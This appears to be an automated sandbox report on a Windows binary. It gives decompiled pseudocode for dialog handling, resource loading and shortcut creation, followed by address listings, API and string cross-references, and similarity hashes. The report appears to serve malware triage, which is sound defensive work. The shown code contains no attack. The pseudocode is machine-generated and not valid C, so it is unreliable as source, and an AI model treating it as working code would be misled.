												if(__di != __ax) {
													L148:
													_push(0x20);
													_pop(__eax);
													do {
														L149:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x3d08;
													L151:
													_push(__eax);
													__eax = E001857E6();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L153;
												}
												L147:
												 *(__ebp - 0x3d08) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x3d06;
												goto L151;
											}
											L144:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L154;
											}
											goto L145;
											L154:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L157;
									} else {
										L138:
										__ebp - 0x19d56 = __ebp - 0x6d50;
										E001857E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
										_push(__ebx);
										_push(__ebp - 0x6d4e);
										__eax = E001815E8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x3d08 = E001857E6(__ebp - 0x3d08, __ebp - 0x3d08);
											_pop(__ecx);
											_pop(__ecx);
										}
										L157:
										__eflags =  *((short*)(__ebp - 0x11d58));
										__ebx = 0x800;
										if( *((short*)(__ebp - 0x11d58)) != 0) {
											__ebp - 0x9d58 = __ebp - 0x11d58;
											__eax = E0016B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
										}
										__ebp - 0xbd58 = __ebp - 0x6d50;
										__eax = E0016B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
										__eflags =  *(__ebp - 0x4d08);
										if(__eflags == 0) {
											__ebp - 0x4d08 = E0017AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
										}
										__ebp - 0x4d08 = E0016B207(__eflags, __ebp - 0x4d08, __ebx);
										__eflags =  *((short*)(__ebp - 0x17d58));
										if(__eflags != 0) {
											__ebp - 0x17d58 = __ebp - 0x4d08;
											E0016FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
											__eax = E0016B207(__eflags, __ebp - 0x4d08, __ebx);
										}
										__ebp - 0x4d08 = __ebp - 0xcd58;
										__eax = E001857E6(__ebp - 0xcd58, __ebp - 0x4d08);
										__eflags =  *(__ebp - 0x13d58);
										__eax = __ebp - 0x13d58;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19d58;
										}
										__ebp - 0x4d08 = E0016FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
										__eax = __ebp - 0x4d08;
										__eflags = E0016B493(__ebp - 0x4d08);
										if(__eflags == 0) {
											L167:
											__ebp - 0x4d08 = E0016FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
											goto L168;
										} else {
											L166:
											__eflags = __eax;
											if(__eflags == 0) {
												L168:
												_push(1);
												__eax = __ebp - 0x4d08;
												_push(__ebp - 0x4d08);
												E0016A04F(__ecx, __ebp) = __ebp - 0xbd58;
												__ebp - 0xad58 = E001857E6(__ebp - 0xad58, __ebp - 0xbd58);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xad58 = E0016BCCF(__eflags, __ebp - 0xad58);
												__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
												__eax = __ebp - 0x3d08;
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
												__edx = __ebp - 0x9d58;
												__esi = __ebp - 0xad58;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
												 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
												 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
												__eax = __ebp - 0x15d58;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
												E0017A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
												__ebp - 0xbd58 = E00179BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
												__eflags =  *(__ebp - 0xcd58);
												if( *(__ebp - 0xcd58) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcd58;
													_push(__ebp - 0xcd58);
													_push(5);
													_push(0x1000);
													__eax =  *0x1c2078();
												}
												goto L172;
											}
											goto L167;
										}
									}
								case 0xa:
									L170:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0x1aa470 = 1;
									}
									goto L172;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eax = E00186420( *(__ebp - 0x3508) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0x1a8461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0x1a8462 = 1;
										} else {
											__eax = 0;
											 *0x1a8461 = __al;
											 *0x1a8462 = __al;
										}
									}
									goto L172;
								case 0xc:
									L102:
									 *0x1bec99 = 1;
									__eax = __eax + 0x1bec99;
									_t115 = __esi + 0x39;
									 *_t115 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t115;
									__ebp = 0xffffcaf8;
									if( *_t115 != 0) {
										_t117 = __ebp - 0x3508; // 0xffff95f0
										__eax = _t117;
										_push(_t117);
										 *0x19e5fc = E00171798();
									}
									goto L172;
							}
							L2:
							_push(0x1000);
							_push(_t295);
							_push(_t221);
							_t221 = E0017A6C7();
							_t295 = _t295 + 0x2000;
							_t291 = _t291 - 1;
							if(_t291 != 0) {
								goto L2;
							} else {
								_t296 = _t291;
								goto L4;
							}
						}
						L173:
						 *[fs:0x0] =  *((intOrPtr*)(_t300 - 0xc));
						return _t220;
					}
					L97:
					if(_t294 != 9) {
						goto L172;
					}
					L98:
					E0017CE22(_t300,  *((intOrPtr*)(_t300 + 8)), _t275, 1, 1);
					goto L99;
				}
			}

0x0017c40e
0x0017c40e
0x0017c40e
0x0017c40e
0x0017c40e
0x0017c410
0x0017c418
0x0017c426
0x00000000
0x00000000
0x0017c42c
0x0017c42c
0x0017c434
0x0017c435
0x0017c43a
0x0017c43b
0x0017c43e
0x00000000
0x00000000
0x0017c444
0x0017c444
0x0017c444
0x0017c447
0x0017c44a
0x0017c44c
0x0017c44f
0x0017c455
0x0017c457
0x0017c458
0x0017c45e
0x0017c45f
0x0017c45f
0x0017c464
0x0017c468
0x00000000
0x00000000
0x0017c46a
0x0017c472
0x00000000
0x00000000
0x0017c474
0x0017c479
0x0017c480
0x0017c485
0x0017c48c
0x0017c48e
0x0017c490
0x0017c497
0x0017c49e
0x0017c4a2
0x0017c4a2
0x0017c4a8
0x0017c4af
0x0017c4b6
0x0017c4ba
0x0017c4ba
0x0017c4bb
0x0017c4bd
0x0017c4c3
0x0017c4c4
0x0017c4c4
0x0017c4c7
0x0017c4c7
0x0017c4ca
0x0017c4ce
0x0017c4e5
0x0017c4e9
0x0017c4f2
0x0017c500
0x0017c500
0x0017c4f2
0x0017ca5c
0x0017ca5c
0x0017ca5c
0x0017ca61
0x0017ca65
0x0017ca69
0x0017ca70
0x0017ca77
0x0017ca7a
0x0017ca7f
0x0017ca82
0x0017ca87
0x0017be4b
0x0017be51
0x0017be57
0x0017be57
0x00000000
0x00000000
0x00000000
0x00000000
0x0017be71
0x0017be88
0x0017be8c
0x00000000
0x0017be8e
0x00000000
0x0017be8e
0x0017be8c
0x0017be96
0x00000000
0x00000000
0x0017be9c
0x0017be9c
0x00000000
0x0017bea3
0x0017bea3
0x0017bea6
0x0017beb9
0x0017bedf
0x0017bef3
0x0017bef6
0x0017bf01
0x0017c045
0x0017c045
0x0017c045
0x0017c04d
0x0017c053
0x0017c058
0x0017c05a
0x00000000
0x00000000
0x0017bf0b
0x0017bf13
0x0017bf19
0x0017bf1f
0x0017bfc5
0x0017bfcc
0x0017bfd2
0x0017bfd5
0x00000000
0x00000000
0x0017bfd7
0x0017bfde
0x0017bfe4
0x0017bfe6
0x00000000
0x0017bfe8
0x0017bfe8
0x0017bfea
0x0017bfeb
0x0017bfef
0x0017c003
0x0017c008
0x0017c012
0x0017c018
0x0017c01b
0x0017bfed
0x0017bfed
0x0017bfee
0x00000000
0x0017c01d
0x0017c02b
0x0017c031
0x0017c033
0x0017c03f
0x0017c03f
0x00000000
0x0017c033
0x0017c01b
0x0017bfe6
0x0017bf25
0x0017bf34
0x0017bf41
0x0017bf52
0x0017bf55
0x0017bf58
0x0017bf6b
0x0017bf72
0x0017bf77
0x0017bf79
0x00000000
0x00000000
0x0017bf7f
0x0017bf86
0x0017bf8b
0x0017bf90
0x0017bf9c
0x0017bfa1
0x0017bfa4
0x0017bfab
0x0017bfad
0x0017bfae
0x0017bfb8
0x0017bfbe
0x0017bfbf
0x00000000
0x0017bfbf
0x0017bf5a
0x0017bf61
0x0017bf67
0x0017bf69
0x00000000
0x00000000
0x00000000
0x0017bf69
0x0017c060
0x0017c060
0x0017c06a
0x0017c06a
0x00000000
0x00000000
0x0017c074
0x0017c074
0x0017c076
0x0017c0c9
0x0017c0ce
0x0017c0d7
0x0017c0d8
0x0017c0de
0x0017c0e3
0x0017c0e6
0x0017c0e8
0x0017c0fa
0x0017c0ff
0x0017c100
0x0017c100
0x0017c101
0x0017c103
0x0017c10a
0x0017c10f
0x0017c103
0x00000000
0x00000000
0x0017c115
0x0017c115
0x0017c117
0x0017c127
0x0017c127
0x00000000
0x00000000
0x0017c132
0x0017c132
0x0017c134
0x00000000
0x00000000
0x0017c13a
0x0017c13a
0x0017c141
0x00000000
0x00000000
0x0017c147
0x0017c147
0x0017c149
0x0017c14f
0x0017c151
0x0017c158
0x0017c159
0x0017c160
0x0017c162
0x0017c162
0x0017c169
0x0017c16e
0x0017c174
0x0017c176
0x00000000
0x0017c17c
0x0017c17c
0x0017c17c
0x0017c17f
0x0017c181
0x0017c182
0x0017c185
0x0017c1ae
0x0017c1ae
0x0017c1b1
0x0017c296
0x0017c29f
0x0017c2a4
0x0017c2a4
0x0017c2a6
0x0017c2a6
0x0017c2a8
0x0017c2aa
0x0017c2b1
0x0017c2b6
0x0017c2b7
0x0017c2b8
0x0017c2ba
0x0017c2bc
0x0017c2c0
0x0017c2c2
0x0017c2c2
0x0017c2c4
0x0017c2c4
0x0017c2c0
0x0017c2c8
0x0017c2ce
0x0017c2db
0x0017c2e2
0x0017c2f2
0x0017c2fc
0x0017c30a
0x0017c310
0x0017c318
0x0017c31d
0x0017c31e
0x0017c31f
0x0017c321
0x0017c335
0x0017c335
0x00000000
0x0017c321
0x0017c1b7
0x0017c1b7
0x0017c1ba
0x0017c1c7
0x0017c1c7
0x0017c1ca
0x0017c1cc
0x0017c1cd
0x0017c1cf
0x0017c1d0
0x0017c1d5
0x0017c1da
0x0017c1e0
0x0017c1e2
0x0017c1e4
0x0017c1e7
0x0017c1ee
0x0017c1ef
0x0017c1f5
0x0017c1f6
0x0017c1f9
0x0017c1fa
0x0017c1fb
0x0017c200
0x0017c203
0x0017c209
0x0017c212
0x0017c215
0x0017c21a
0x0017c21c
0x0017c21e
0x0017c220
0x0017c220
0x0017c222
0x0017c222
0x0017c224
0x0017c224
0x0017c22c
0x0017c233
0x0017c235
0x0017c23c
0x0017c242
0x0017c244
0x0017c245
0x0017c24d
0x0017c25c
0x0017c25c
0x0017c24d
0x0017c267
0x0017c269
0x0017c278
0x0017c27e
0x0017c284
0x0017c28f
0x0017c28f
0x00000000
0x0017c284
0x0017c1bc
0x0017c1bc
0x0017c1c1
0x00000000
0x00000000
0x00000000
0x0017c1c1
0x0017c187
0x0017c187
0x0017c18b
0x00000000
0x00000000
0x0017c18d
0x0017c18d
0x0017c190
0x0017c192
0x0017c195
0x00000000
0x0017c19b
0x0017c1a4
0x00000000
0x0017c1a4
0x0017c195
0x00000000
0x0017c340
0x0017c340
0x0017c341
0x0017c346
0x0017c348
0x0017c34a
0x0017c34b
0x0017c34b
0x00000000
0x0017c381
0x0017c381
0x0017c388
0x0017c38a
0x0017c38a
0x0017c38c
0x0017c3bb
0x0017c3bb
0x0017c3c1
0x00000000
0x0017c3c1
0x0017c38e
0x0017c38e
0x0017c38e
0x0017c391
0x0017c3aa
0x0017c3aa
0x0017c3b0
0x0017c3b0
0x00000000
0x0017c3b0
0x0017c393
0x0017c393
0x0017c393
0x0017c396
0x00000000
0x00000000
0x0017c398
0x0017c398
0x0017c398
0x0017c39b
0x00000000
0x00000000
0x0017c3a1
0x0017c3a1
0x00000000
0x00000000
0x00000000
0x00000000
0x0017c534
0x0017c534
0x0017c537
0x0017c6b8
0x0017c6b8
0x0017c6bb
0x0017c6c1
0x0017c6c8
0x0017c6ca
0x0017c6ca
0x0017c6d4
0x0017c6d4
0x00000000
0x0017c6bb
0x0017c53d
0x0017c53d
0x0017c543
0x0017c551
0x0017c55d
0x0017c55f
0x0017c561
0x0017c566
0x0017c566
0x0017c566
0x0017c57e
0x0017c58b
0x0017c590
0x0017c592
0x00000000
0x00000000
0x0017c564
0x0017c564
0x0017c564
0x0017c565
0x0017c565
0x0017c594
0x0017c59e
0x0017c5a4
0x0017c5ac
0x00000000
0x00000000
0x0017c5b2
0x0017c5b2
0x0017c5b9
0x00000000
0x00000000
0x0017c5bf
0x0017c5bf
0x0017c5c1
0x0017c5c8
0x0017c5ce
0x0017c5d0
0x0017c5d1
0x0017c5d6
0x0017c5d7
0x0017c5d8
0x0017c5da
0x0017c62e
0x0017c62e
0x0017c636
0x0017c644
0x0017c655
0x0017c663
0x0017c663
0x0017c66f
0x0017c674
0x0017c676
0x0017c686
0x0017c690
0x0017c695
0x0017c698
0x00000000
0x0017c69e
0x0017c69e
0x0017c6a3
0x0017c6a3
0x0017c6a5
0x0017c6ac
0x0017c6b2
0x00000000
0x0017c6b2
0x0017c698
0x0017c5dc
0x0017c5dc
0x0017c5de
0x0017c5e0
0x0017c5e7
0x00000000
0x00000000
0x0017c5e9
0x0017c5e9
0x0017c5eb
0x0017c5f1
0x0017c5f1
0x0017c5f1
0x0017c5f5
0x00000000
0x00000000
0x0017c5f7
0x0017c5f7
0x0017c5f8
0x0017c5fe
0x0017c601
0x0017c603
0x0017c606
0x00000000
0x00000000
0x0017c608
0x00000000
0x0017c608
0x0017c60a
0x0017c615
0x0017c61f
0x0017c624
0x0017c624
0x0017c626
0x00000000
0x00000000
0x0017c6e0
0x0017c6e0
0x0017c6e3
0x0017c6e5
0x0017c6ec
0x0017c6ee
0x0017c6f4
0x0017c6f5
0x0017c6fa
0x0017c6fb
0x0017c6fb
0x0017c700
0x0017c703
0x0017c709
0x0017c709
0x0017c70e
0x00000000
0x00000000
0x0017c71a
0x0017c71a
0x0017c71d
0x00000000
0x00000000
0x0017c723
0x0017c723
0x0017c725
0x0017c72c
0x0017c734
0x0017c73a
0x0017c73f
0x0017c742
0x0017c777
0x0017c77c
0x0017c782
0x0017c783
0x0017c788
0x0017c744
0x0017c744
0x0017c747
0x0017c74d
0x0017c763
0x0017c768
0x0017c769
0x0017c76e
0x0017c74f
0x0017c74f
0x0017c754
0x0017c755
0x0017c75a
0x0017c75a
0x0017c74d
0x0017c78f
0x0017c791
0x0017c798
0x0017c7a6
0x0017c7ad
0x0017c7b2
0x0017c7b3
0x0017c7b4
0x0017c7b6
0x0017c7b7
0x0017c7be
0x0017c807
0x0017c80e
0x0017c813
0x0017c815
0x00000000
0x00000000
0x0017c81b
0x0017c81b
0x0017c81d
0x0017c823
0x0017c82a
0x00000000
0x00000000
0x0017c82c
0x0017c82c
0x0017c82e
0x0017c82f
0x0017c82f
0x0017c82f
0x0017c832
0x0017c835
0x0017c83f
0x0017c83f
0x0017c841
0x0017c843
0x0017c84d
0x0017c852
0x0017c854
0x0017c892
0x0017c892
0x0017c895
0x0017c895
0x0017c897
0x0017c898
0x0017c898
0x00000000
0x0017c898
0x0017c856
0x0017c856
0x0017c858
0x0017c859
0x0017c85b
0x0017c85e
0x0017c873
0x0017c873
0x0017c875
0x0017c876
0x0017c876
0x0017c876
0x0017c879
0x0017c879
0x0017c87e
0x0017c87f
0x0017c885
0x0017c885
0x0017c886
0x0017c88b
0x0017c88c
0x0017c88d
0x00000000
0x0017c88d
0x0017c860
0x0017c860
0x0017c867
0x0017c86a
0x0017c86b
0x00000000
0x0017c86b
0x0017c837
0x0017c837
0x0017c839
0x0017c83a
0x0017c83d
0x00000000
0x00000000
0x00000000
0x0017c89a
0x0017c89a
0x0017c89d
0x0017c89d
0x0017c8a2
0x0017c8a4
0x0017c8a6
0x0017c8a6
0x0017c8a8
0x0017c8a8
0x00000000
0x0017c7c0
0x0017c7c0
0x0017c7c7
0x0017c7d3
0x0017c7d9
0x0017c7da
0x0017c7db
0x0017c7e0
0x0017c7e3
0x0017c7e5
0x0017c7eb
0x0017c7ed
0x0017c7fb
0x0017c800
0x0017c801
0x0017c801
0x0017c8ab
0x0017c8ab
0x0017c8b3
0x0017c8b8
0x0017c8c2
0x0017c8c9
0x0017c8c9
0x0017c8d6
0x0017c8dd
0x0017c8e2
0x0017c8ea
0x0017c8f6
0x0017c8f6
0x0017c903
0x0017c908
0x0017c910
0x0017c91a
0x0017c927
0x0017c92e
0x0017c92e
0x0017c93a
0x0017c941
0x0017c946
0x0017c94e
0x0017c954
0x0017c955
0x0017c956
0x0017c958
0x0017c958
0x0017c96d
0x0017c972
0x0017c97e
0x0017c980
0x0017c991
0x0017c99e
0x00000000
0x0017c982
0x0017c982
0x0017c98d
0x0017c98f
0x0017c9a3
0x0017c9a3
0x0017c9a5
0x0017c9ab
0x0017c9b1
0x0017c9bf
0x0017c9c4
0x0017c9c5
0x0017c9cd
0x0017c9d2
0x0017c9d9
0x0017c9df
0x0017c9e1
0x0017c9e7
0x0017c9ed
0x0017c9ef
0x0017c9f8
0x0017c9fb
0x0017c9fd
0x0017ca06
0x0017ca09
0x0017ca0f
0x0017ca12
0x0017ca1b
0x0017ca2a
0x0017ca2f
0x0017ca37
0x0017ca39
0x0017ca3a
0x0017ca40
0x0017ca41
0x0017ca43
0x0017ca48
0x0017ca48
0x00000000
0x0017ca37
0x00000000
0x0017c98f
0x0017c980
0x00000000
0x0017ca50
0x0017ca50
0x0017ca53
0x0017ca55
0x0017ca55
0x00000000
0x00000000
0x0017c3cd
0x0017c3cd
0x0017c3d5
0x0017c3db
0x0017c3de
0x0017c402
0x0017c3e0
0x0017c3e0
0x0017c3e3
0x0017c3f6
0x0017c3e5
0x0017c3e5
0x0017c3e7
0x0017c3ec
0x0017c3ec
0x0017c3e3
0x00000000
0x00000000
0x0017c50a
0x0017c50a
0x0017c50b
0x0017c510
0x0017c510
0x0017c510
0x0017c513
0x0017c518
0x0017c51e
0x0017c51e
0x0017c524
0x0017c52a
0x0017c52a
0x00000000
0x00000000
0x0017be58
0x0017be58
0x0017be5d
0x0017be5e
0x0017be5f
0x0017be64
0x0017be6a
0x0017be6d
0x00000000
0x0017be6f
0x0017be6f
0x00000000
0x0017be6f
0x0017be6d
0x0017ca8d
0x0017ca93
0x0017ca9d
0x0017ca9d
0x0017c4d0
0x0017c4d3
0x00000000
0x00000000
0x0017c4d9
0x0017c4e0
0x00000000
0x0017c4e0

APIs

_wcschr.LIBVCRUNTIME ref: 0017C435

Part of subcall function 001717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0016BB05,00000000,.exe,?,?,00000800,?,?,001785DF,?), ref: 001717C2

Strings

HIDE, xrefs: 0017C474
<, xrefs: 0017C41E
MIN, xrefs: 0017C4A3
MAX, xrefs: 0017C487

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: d084336f53b7519d469e11697ab957b2afc869a738988677f261b6b2a233c3b4
Instruction ID: 338c9558d845b9969ccab18fa233b6775bf0021bc4285ca45a53f48dddcc346a
Opcode Fuzzy Hash: d084336f53b7519d469e11697ab957b2afc869a738988677f261b6b2a233c3b4
Instruction Fuzzy Hash: 6B316576904609AADF35DB94DC51EEE77BDEB64304F00806AF90DD6150EBB19FC48BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0017ADED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017ADED(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0x1a0ed0, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t21 != 0) {
					_t24 = E00179E1C(0x65);
				}
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
				} else {
					GetObjectW(_t24, 0x18,  &_v28);
				}
				if(E00179D1A(_t31) != 0) {
					if(_t21 != 0) {
						_t28 = E00179E1C(0x66);
						if(_t28 != 0) {
							DeleteObject(_t24);
							_t24 = _t28;
						}
					}
					_t11 = E00179D5A(_v20);
					_t13 = E00179F5D(_t23, _t35, _t24, E00179D39(_v24), _t11);
					DeleteObject(_t24);
					_t24 = _t13;
				}
				return _t24;
			}

0x0017aded
0x0017aded
0x0017ae03
0x0017ae07
0x0017ae0c
0x0017ae15
0x0017ae15
0x0017ae17
0x0017ae19
0x0017ae2a
0x0017ae31
0x0017ae1b
0x0017ae22
0x0017ae22
0x0017ae3f
0x0017ae44
0x0017ae4d
0x0017ae51
0x0017ae54
0x0017ae5a
0x0017ae5a
0x0017ae51
0x0017ae5f
0x0017ae6f
0x0017ae77
0x0017ae7d
0x0017ae7f
0x0017ae87

APIs

LoadBitmapW.USER32(00000065), ref: 0017ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 0017AE22
DeleteObject.GDI32(00000000), ref: 0017AE54
DeleteObject.GDI32(00000000), ref: 0017AE77

Part of subcall function 00179E1C: FindResourceW.KERNEL32(0017AE4D,PNG,?,?,?,0017AE4D,00000066), ref: 00179E2E
Part of subcall function 00179E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0017AE4D,00000066), ref: 00179E46
Part of subcall function 00179E1C: LoadResource.KERNEL32(00000000,?,?,?,0017AE4D,00000066), ref: 00179E59
Part of subcall function 00179E1C: LockResource.KERNEL32(00000000,?,?,?,0017AE4D,00000066), ref: 00179E64

Strings

], xrefs: 0017AE2A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: 1eb463383b831858bf8a960aa08f183891388866356963f4b3b5bb664d44d962
Instruction ID: dd6015a2fc67c85811692ec5050e74973c9fc630dbb488fdf69f62d619b6893f
Opcode Fuzzy Hash: 1eb463383b831858bf8a960aa08f183891388866356963f4b3b5bb664d44d962
Instruction Fuzzy Hash: 2201F532580215A7C72167A49C05EBF7B7AAFD1B52F588016FD08A7291DF318C2996B2

Uniqueness

Uniqueness Score: -1.00%

Function 0017CC90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0017CC90(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E0016130B(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0x1becac = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0x1becac);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0x1becac, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0017cc91
0x0017cc96
0x0017cc9b
0x0017cca0
0x0017ccb8
0x0017cd1a
0x00000000
0x0017cd1c
0x0017ccba
0x0017ccc0
0x0017ccff
0x0017cd05
0x0017cd14
0x00000000
0x0017cd14
0x0017ccc5
0x0017ccd4
0x00000000
0x0017ccd4
0x0017ccca
0x0017cccd
0x0017ccf1
0x0017ccf7
0x0017ccda
0x0017ccdb
0x00000000
0x0017ccdb
0x0017ccd2
0x0017ccd8
0x00000000
0x0017ccd8
0x00000000

APIs

Part of subcall function 0016130B: GetDlgItem.USER32(00000000,00003021), ref: 0016134F
Part of subcall function 0016130B: SetWindowTextW.USER32(00000000,001935B4), ref: 00161365

EndDialog.USER32(?,00000001), ref: 0017CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0017CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0017CD05
SetDlgItemTextW.USER32(?,00000068), ref: 0017CD14

Strings

RENAMEDLG, xrefs: 0017CCA8

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 792cb9a7c9cedf3c12827251a968941c2c495b962047fd3838ffe10b013b8997
Instruction ID: a22383c5d40eb14f71967ecb11038c230b1db9ef99ce4e4ab510ef67f91225af
Opcode Fuzzy Hash: 792cb9a7c9cedf3c12827251a968941c2c495b962047fd3838ffe10b013b8997
Instruction Fuzzy Hash: BF0124332843107BD6224F649D08FA73FBCEB9A742F118419F34AA64E1C7B59984CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 001875C2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00187573,00000000,?,00187513,00000000,0019BAD8,0000000C,0018766A,00000000,00000002), ref: 001875E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001875F5
FreeLibrary.KERNEL32(00000000,?,?,?,00187573,00000000,?,00187513,00000000,0019BAD8,0000000C,0018766A,00000000,00000002), ref: 00187618

Strings

CorExitProcess, xrefs: 001875ED
mscoree.dll, xrefs: 001875DB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 44cb8872aa3953591152b5072696c8bfb95ab929a310b5ac001b3a4af3bd630f
